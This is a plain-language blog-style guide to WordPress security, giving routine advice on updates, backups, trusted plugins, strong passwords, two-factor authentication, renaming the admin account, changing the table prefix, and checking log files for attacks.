How to secure your Wordpress website
The security of your WordPress website is an issue that should be always in your mind because like other open source software, security vulnerabilities can arise if you do not take the necessary precautions. Below we will see the most common types of vulnerabilities, and what you can do to have the safer WordPress installation possible.
What is security?
The security of an application is to reduce the risk and not to eliminate it. The actions that could improve the overall condition of your website's security and as a result reduce the chances of being a target and perhaps victim of malicious users.
Your hosting server plays an important role for the security of your website. The administrator should check the availability of resources, privacy and integrity of the server. He should also ensure that the server is equipped with the latest stable versions of software running in it and have reliable methods to backup it's files.
Hosters are responsible for the server where your website is hosted but is not identified with your website itself. The role of the technical manager of a website is different from that of the server administrator. Sometimes absence of a developer, the technical manager debts takes each one of us that builds a simple website, who manages and updates/upgrades, so everyone is a potential or active website technical manager.
Updating/upgrading a website has great importance. Some of the practices that you could follow as technical manager of your website are:
- Your website's management environment is in the latest available version.
- Maintaining backups of your installation should be done regularly so that the recovery of your system in case of emergency is feasible and possible.
- Avoiding plugin or theme installations from untrusted sources that can lead to problems. A reliable source is the WordPress repository.
Ensure that the computers you use are free of spyware and viruses. We suggest you keep your operating system and software, especially your web browser updated and if possible avoid browsing Internet websites that are considered untrusted.
WordPress as software, is regularly updated to address security flaws that may occur. For this purpose it would be good to keep it updated to the latest version and avoid to stay in an older version.
The latest version of WordPress is always available from it's official website, and it is recommended not to download or install it from anywhere else. To help you WordPress supports an automatic update option that you can use.
Many potential vulnerabilities can be avoided if you have a strong password.
When choosing a password it is advisable to keep in mind:
- Do not use your real name, username, company name or your website's name.
- Do not use words from the dictionary of any language.
- The password is not too small.
- Your password should contain numbers, letters and symbols.
Also a good idea is to turn on two factor authentication as an additional safety measure.
Make sure that your plugins are updated at the latest version. If you are not using some of them it would be better to delete them from your system.
Security through obscurity
Hiding information in WordPress is an other form of protection that can help your websites security. Two easy ways to do this are:
- Renaming your administrator account: When creating your administrator account try to avoid easy usernames like admin, administrator or webmaster.
- Changing your tables prefix: Many SQL injection attacks suppose that the default tables prefix in your database is wp_ . Changing the prefix to something different can block at least some of this attacks.
Another form of protection is the frequent backups of your website's data and MySQL databases and keeping them in a trusted position.
A log file helps you see what, from whom and when something happened on your website. Additionally lets you determine the IP address and the actions taken by the attacker, without telling you the username that logged in.
Through log files you can see attacks like - Cross Site Scripting (XSS), Remote File Inclusion (RFI), Local File Inclusion (LFI), brute force attack etc. You can also see when theme and plugin editors was used, when someone updated your widgets and when new pages and posts were added. An attack almost always leaves traces, either logs or system files (new files, modified files, etc).